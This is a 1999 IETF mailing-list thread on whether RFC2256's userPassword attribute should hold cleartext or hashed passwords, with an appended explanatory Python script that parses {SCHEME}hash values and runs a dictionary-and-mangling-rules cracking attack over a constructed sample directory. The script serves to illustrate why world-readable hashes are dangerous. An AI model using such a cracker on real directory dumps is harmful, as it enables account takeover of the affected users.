
RE: RFC2256: userPassword



Having world readable hashed passwords is almost as bad as having plaintext
ones. In many authentication protocols, the hashed password is plaintext
equivalent (i.e., lets you authenticate as the user whose password hash you
have). In many other cases, checking the hash of 100,000 easy-to-remember
variants of a few million "dictionary" words to see if they match a
particular hashed password can be done in a few days by one computer. (1
million checks per second is not infeasible.)

-----Original Message-----
From: Kurt D. Zeilenga [mailto:Kurt@OpenLDAP.Org]
Sent: Tuesday, June 29, 1999 8:32 AM
To: ietf-ldapext@netscape.com
Subject: RFC2256: userPassword


RFC2256 5.36 userPassword says "Passwords are stored using an
Octet String syntax and are not encrypted."  However, it's
common practice to store "encrypted" passwords in userPassword
using a mechanism derived from RFC2307 (ie: userPassword: {method}hash).

For security considerations, I believe it unwise to ever maintain
a cleartext userPassword.  I believe RFC2256 should be updated to
read:

  Passwords are stored using an Octet String syntax and SHOULD be
  encrypted.  ...

It would also be wise to standardize the syntax for encrypted
userPassword representation (ie: replace Octet String with an
appropriate syntax).

Kurt
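An added example, not part of this thread or of any server's code: a small Python script that parses userPassword values in the {scheme}hash convention Kurt's message refers to, verifies candidates against them, and runs the dictionary-plus-variants attack the reply describes over a constructed directory dump. The scheme names {SHA}, {SSHA}, {MD5} and {SMD5} follow OpenLDAP's convention (RFC2307 itself only names {crypt}); the word list, salts and entries are constructed for the example, and the mangling rules in variants() are an illustrative subset.

```python
import base64
import hashlib
from typing import Iterator, Optional

# Scheme names as used by OpenLDAP and Netscape-derived servers (assumed here).
# Salted schemes store digest || salt; the salt is whatever follows the digest.
_DIGESTS = {"SHA": ("sha1", 20), "SSHA": ("sha1", 20),
            "MD5": ("md5", 16), "SMD5": ("md5", 16)}


def parse_userpassword(value: str) -> tuple[str, bytes, bytes]:
    """Split '{SCHEME}base64' into (scheme, digest, salt).

    A value with no '{scheme}' prefix is cleartext, which is what RFC2256 5.36
    literally describes; it is returned with scheme 'CLEARTEXT'.
    """
    if not value.startswith("{") or "}" not in value:
        return "CLEARTEXT", value.encode(), b""
    scheme, _, payload = value[1:].partition("}")
    scheme = scheme.upper()
    if scheme == "CLEARTEXT":
        return scheme, payload.encode(), b""
    if scheme not in _DIGESTS:
        raise ValueError(f"unsupported scheme {{{scheme}}}")
    raw = base64.b64decode(payload)
    digest_len = _DIGESTS[scheme][1]
    return scheme, raw[:digest_len], raw[digest_len:]


def encode_userpassword(scheme: str, password: str, salt: bytes = b"") -> str:
    """Produce a {SCHEME}base64 value the way a directory server would store it."""
    scheme = scheme.upper()
    if scheme == "CLEARTEXT":
        return password
    algo = _DIGESTS[scheme][0]
    if scheme in ("SHA", "MD5"):
        salt = b""  # unsalted schemes ignore any salt
    digest = hashlib.new(algo, password.encode() + salt).digest()
    return "{" + scheme + "}" + base64.b64encode(digest + salt).decode()


def verify(stored: str, candidate: str) -> bool:
    """Check one candidate password against a stored userPassword value."""
    scheme, digest, salt = parse_userpassword(stored)
    if scheme == "CLEARTEXT":
        return digest == candidate.encode()
    algo = _DIGESTS[scheme][0]
    return hashlib.new(algo, candidate.encode() + salt).digest() == digest


def variants(word: str) -> Iterator[str]:
    """A few 'easy-to-remember' mangling rules of the kind the reply refers to."""
    for base in {word, word.lower(), word.capitalize(), word.upper()}:
        yield base
        yield base + "!"
        yield base[::-1]
        for n in range(100):
            yield f"{base}{n}"
    leet = word.lower().translate(str.maketrans("aeios", "43105"))
    yield leet
    yield leet + "!"


def dictionary_attack(stored: str, wordlist: list[str]) -> Optional[str]:
    """Return the first dictionary variant matching the stored value, or None.

    For an unsalted scheme one digest computation could be compared against
    every entry in the directory at once; a salt forces one pass per entry
    but does nothing to stop the attack on a guessable password.
    """
    scheme, digest, _ = parse_userpassword(stored)
    if scheme == "CLEARTEXT":
        return digest.decode()  # nothing to crack
    for word in wordlist:
        for cand in variants(word):
            if verify(stored, cand):
                return cand
    return None


def crack_directory(entries: dict[str, str], wordlist: list[str]) -> dict[str, Optional[str]]:
    """Run the attack over every entry of a (constructed) world-readable dump."""
    return {uid: dictionary_attack(value, wordlist) for uid, value in entries.items()}


# Constructed sample data; salts are fixed so the run is reproducible.
WORDLIST = ["password", "welcome", "summer", "ldap", "directory"]
SAMPLE_ENTRIES = {
    "alice": encode_userpassword("SHA", "password"),
    "bob": encode_userpassword("SSHA", "Welcome1", salt=b"\x01\x02\x03\x04"),
    "carol": encode_userpassword("SMD5", "summer!", salt=b"salt"),
    "dave": "secret-cleartext",  # stored exactly as RFC2256 5.36 describes
    "erin": encode_userpassword("SSHA", "xV9#kq2!Lm0pZ", salt=b"\xaa\xbb\xcc\xdd"),
}

if __name__ == "__main__":
    for uid, found in crack_directory(SAMPLE_ENTRIES, WORDLIST).items():
        print(f"{uid:6} {SAMPLE_ENTRIES[uid][:30]:32} -> {found}")
```

Only erin, whose password is not derivable from the word list, survives; the salted entries fall as quickly as the unsalted one because the salt is stored next to the digest. Real wordlists are millions of entries and real rule sets far larger than variants(), which is the reply's point about world-readable hashes.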